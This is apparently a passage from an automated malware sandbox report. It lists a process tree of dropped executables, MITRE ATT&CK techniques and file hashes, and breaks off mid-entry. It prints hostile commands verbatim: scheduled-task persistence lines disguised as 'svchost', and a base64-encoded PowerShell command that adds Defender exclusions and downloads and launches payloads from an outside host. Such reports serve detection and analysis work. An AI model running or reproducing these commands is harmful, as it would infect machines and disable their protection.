- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2400
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2636
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2868
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2288
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2120
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:1224
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2616
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2840
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:1596
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2804
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2224
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:1932
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:1056
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2972
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:1840
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:1648
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2056
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:808
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2176
- C:\Users\Admin\AppData\Local\Temp\levislocker.exe
  "C:\Users\Admin\AppData\Local\Temp\levislocker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:816
- C:\Users\Admin\AppData\Local\Temp\malecus.exe
  "C:\Users\Admin\AppData\Local\Temp\malecus.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Users\Admin\AppData\Local\Temp\evil.exe
  "C:\Users\Admin\AppData\Local\Temp\evil.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3036
- C:\Users\Admin\AppData\Local\Temp\Solaris.exe
  "C:\Users\Admin\AppData\Local\Temp\Solaris.exe"
  2⤵
  - Executes dropped EXE
  PID:1472
- C:\Users\Admin\AppData\Local\Temp\TEST.exe
  "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2128
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC12.tmp.bat""
    3⤵
    PID:2236
- C:\Users\Admin\AppData\Local\Temp\ss.exe
  "C:\Users\Admin\AppData\Local\Temp\ss.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
  "C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
  - - C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
      "C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
      4⤵
      Executes dropped EXE
      PID:2720
  - - C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
      "C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
      4⤵
      Executes dropped EXE
      PID:2056
  - - C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
      "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

Filesize
233KB

MD5
4ef3177a2e94ce3d15ae9490a73a2212

SHA1
a34f47568ce7fcea97a002eebeae385efa98790c

SHA256
87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

SHA512
635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

Download Submit
C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe

Filesize
65KB

MD5
694efccf0c905305f5c8418499fe335c

SHA1
1fa42976df8d8b1848ac2d99468da3c17785d285

SHA256
7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b

SHA512
294fecfb3abb91a9a61001b26acced7a1cc99abb0a140a8bc352b51794e3750b7579b44543d1afde676c0e75ddc6c80c44eb49b959946654bc5f88e0d2b49fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
100KB

MD5
21560cb75b809cf46626556cd5fbe3ab

SHA1
f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

SHA256
d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

SHA512
21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solaris.exe

Filesize
47KB

MD5
05859c4616d5d3de2927122b4d5303b9

SHA1
7ebef99aedeb8a54fe3c70424282e462df954ef6

SHA256
af51004a01329780e0cf6c04a389de96163e61aa004833cff7d59abef2a053a6

SHA512
d73f6b8a9313a727931135107f800e8885d0e471aaccf1461928a50c6c2a4e2921a1ae6eff8a2a1755656af3cb380782a7e0744573bc29691d0e964c32920d15

Download Submit
C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe

Filesize
2.4MB

MD5
240b2940002c38ebb3df80246920a729

SHA1
ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467

SHA256
552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d

SHA512
d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168

Filesize
67KB

MD5
ed10995a048cad2427dcf3d647fe0358

SHA1
f8bf2952b94dfb4aa36cf70fa982f2177197e485

SHA256
2e42395d6ab6687f6e6881851a4eec7bc97baac18a8fe5509b9c6379fda06659

SHA512
934e6424512e130f5d2977d7639c732b1c3618e27303dc34411e5cf0da7b72f4253f394ec588807585276e39a20c9cca896d29f93866a8c4ffaa35d14e0d64fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe

Filesize
3.8MB

MD5
0f597e254135a708137a52470943316c

SHA1
86240613459d76fff43d9995f73c97f75ee680c1

SHA256
8763150d50e887141961f8c027acf92d5698e8e925cc5e76515d6d8fe330cb26

SHA512
408fe3bd85921cdf5576caa55e28213849c07340817c33605a68fa3da72ae512c0ac710b3a3cb4cbff44c5f64cfb0715034604a5de7bf9c5b6adce4919a2f6eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe

Filesize
9KB

MD5
757c3888ff96ebc33c2be55f648b8446

SHA1
4be04b6713b83d5e6fb48620a11629a1735dc273

SHA256
73d673b3175a1dc7e77b01537a6de77d1f78c9afc063eab263fd0c24848feb93

SHA512
421d6dcaf8031565fd5eb9a11bd167f9bc198e8622386dcba81354800eb13d533f045c0ae29de05d0d275bba151b5a932aa70f2c5e8b3c073e16170ec2b3e840

Download Submit
C:\Users\Admin\AppData\Local\Temp\error.exe

Filesize
10KB

MD5
bcdc1a6f1805a6130dfd1913b1659bc2

SHA1
f4b80ac7fe17332f916ce450d29f7ce671e49bb0

SHA256
78e706c684da0134ace5fdd5cc5e7263c5f17b905d783f928eb68d558116aac6

SHA512
0769ecf207e224ceceba33854b457d4389897163037b91141b958762304f64e75af32679c4d6ea88c4cf02aaadde077fef048837ef280a13948e82d69b6358b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\evil.exe

Filesize
23KB

MD5
0e0d73422110762ad112c39647865d09

SHA1
4bb94e94e65a8bc12313783df99b96d89d7fd764

SHA256
02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

SHA512
e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

Download Submit
C:\Users\Admin\AppData\Local\Temp\javawvd.exe

Filesize
36KB

MD5
bb13e4ebdcb3e7d6bcd78601fd01b654

SHA1
4165ceda368602fb21495c55a95548b7056f4413

SHA256
55385f8be83a7e193390aa5c3a9a9934e603d6d3d164e5f496ece0ad553e9027

SHA512
48ad4c2e17a7eea58c9c8ca47a68e129f889c117ddcdfffb12cf478f4b40223df1b923367309898de219a2dc7b4e95f470f7297c1d60913c59c8acb4db6f50e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC12.tmp.bat

Filesize
169B

MD5
c7426035f939b2e5cfd6f4298a3b2bb9

SHA1
bb60d639a13df0f01c42aaf66568929569de9e26

SHA256
837356f9f60436e046bd8dfdf260c41f802853ec4968caa457a8db365e4cfe74

SHA512
a7bb708c034ba8a99c7ce9b6a9a90b476440eae9371ea5d59c7b8cbb2e22485cfbbcb9dbde403ff1fff65618bcc02cfc04534d808879817c645bbbccd0d4c45f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9785ae3502ddd656913945f36559d648

SHA1
4d6b4da9a672e4614b91a32b510eab713a2562ff

SHA256
5ddc91483cffe494ad7c302afe2761959717065d27e6dd51ad78a1fc97448271

SHA512
41486c672206235ed019233ed47cf4918418aa48ab5d93fc2f23df22cb37b53096c77371ac7db4469b47f856c222b44b758907c147fae23c77a382ee2f30fa42

Download Submit
\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

Filesize
568KB

MD5
4448a3c2ddfdda45009b440faa39a5fe

SHA1
b16a26331d6ebe8f4a45b43e8b0251a715139b10

SHA256
70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

SHA512
094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

Download Submit
\Users\Admin\AppData\Local\Temp\BlueScreen.exe

Filesize
9KB

MD5
b01ee228c4a61a5c06b01160790f9f7c

SHA1
e7cc238b6767401f6e3018d3f0acfe6d207450f8

SHA256
14e6ac84d824c0cf6ea8ebb5b3be10f8893449474096e59ff0fd878d49d0c160

SHA512
c849231c19590e61fbf15847af5062f817247f2bcd476700f1e1fa52dcafa5f0417cc01906b44c890be8cef9347e3c8f6b1594d750b1cebdd6a71256fed79140

Download Submit
\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

Filesize
1.6MB

MD5
a42d640eb78c5d5b867abef05e5231d6

SHA1
0b1068a2b47798feb89b917ff4297ab0328c4296

SHA256
73d8301c93c887eedd6777610a37a2b7484ab6b2555b19d241480483324b1952

SHA512
21c3c444db9c20d2faabee48040e06cfb2ff2941151b1a4e004a0e02c48b9fe8de69b0072365395d0bc65433f126e1fb20c10e7d1526192c281c377011f07ae8

Download Submit
\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

Filesize
1.8MB

MD5
55677d2f4f251b558660652002933369

SHA1
804357acd8e75f6a8db9b907a8df882e8588b6bd

SHA256
f714fb12a601649f1e0840a75265337c77683ec64a599f0631d2ba512bcee5f5

SHA512
12343e2ede7dc8534a4682a007ca67b34c287d4e1f7d3565d31860d72d643ad9923b59953571e95c404a9b2951e6bdd4e6e6584f246852f02f53bd832d0bc119

Download Submit
\Users\Admin\AppData\Local\Temp\TEST.exe

Filesize
37KB

MD5
ca70b79092c1b1e6dc8eb7950864b0ee

SHA1
3396cebc62c348fc96463a73a40eb4e5e6bc09c5

SHA256
2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

SHA512
9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

Download Submit
\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe

Filesize
33KB

MD5
a7878575f2e9f431c354c17a3e768fd9

SHA1
1824b6cb94120af47a0540af88bfc51435a4c20d

SHA256
375552e53a0c25aa36cd66827b97f7576177d1fa81efd978a55b2ec93a5b5fdd

SHA512
4f9de23fc13f414c8d6c82a7cd9ef5dfa2e7855ba642b745f62ad8b4af8dccd9269b4dec5468632af0ff5353b0d4c8e85f758ea794469f355f762cb1cc747019

Download Submit
\Users\Admin\AppData\Local\Temp\concos_1.6.exe

Filesize
15KB

MD5
eed739fea0bc483844ddf8ddcce053d0

SHA1
06e3c942854aa1651069d99279f7f61f7dd6470d

SHA256
72b8b1fb511bbc8c3d883a1b6fa0ad55a731bda7585ab1f5670ab6a5d7a36225

SHA512
0c6621efca8b6b23e10ea6e6db6e7bc16596fb2bed72b703d460ac8b2deb388d6fae9bc8a47a139ab08349546b7c743cd7097aea21c55d469f45a655fb4c32b2

Download Submit
\Users\Admin\AppData\Local\Temp\levislocker.exe

Filesize
914KB

MD5
f20c3ceba1ac2530208c3e7b9f954286

SHA1
8bae89f6d3b8376048643397408e63942fd66f27

SHA256
ef2dfff6121e80e3fa88f86da7941f3e9a613f1ed43188be1d8df0a9b39c33cd

SHA512
8a7a63da9ac92469f8c2f1114693777e46836a6e2caeca255c21d49c385af58dad7f43264c14cc62aa65affbe0b2e528a9989129cc476b1d7d5c44c80616202c

Download Submit
\Users\Admin\AppData\Local\Temp\malecus.exe

Filesize
15KB

MD5
0e741eb3f92a7a739628d04a5fd4aab9

SHA1
87a8865773a791ab3ca68201cee7a0c3fef2fab3

SHA256
1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

SHA512
1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

Download Submit
\Users\Admin\AppData\Local\Temp\ss.exe

Filesize
202KB

MD5
e61bc4ecaac4354b240d56fa48c67790

SHA1
c8c83c518188d7adf2a2a485b20e033a6f8a0602

SHA256
4f4732e54644b08be1c2ac9851fb21c947570d674083e9f614f3cbeef3ccf1e6

SHA512
4bec8a6067b1aa9f2b25559c5bac61aa45b90619fb713432824e9e8bd2c06e4193acab18031c7df9eb643bc17b3aa0807b49ce790b13870248f8907ad89c6ccc

Download Submit
\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe

Filesize
2.1MB

MD5
114bb583f6b81b9f88c233a61a62aef2

SHA1
22173c3e46fcc76287e8eeb237827954cf2db01f

SHA256
c500e5edf70c0ebe3dc69ab8c5e52204376d80e145c421441f3dec17181a2bc0

SHA512
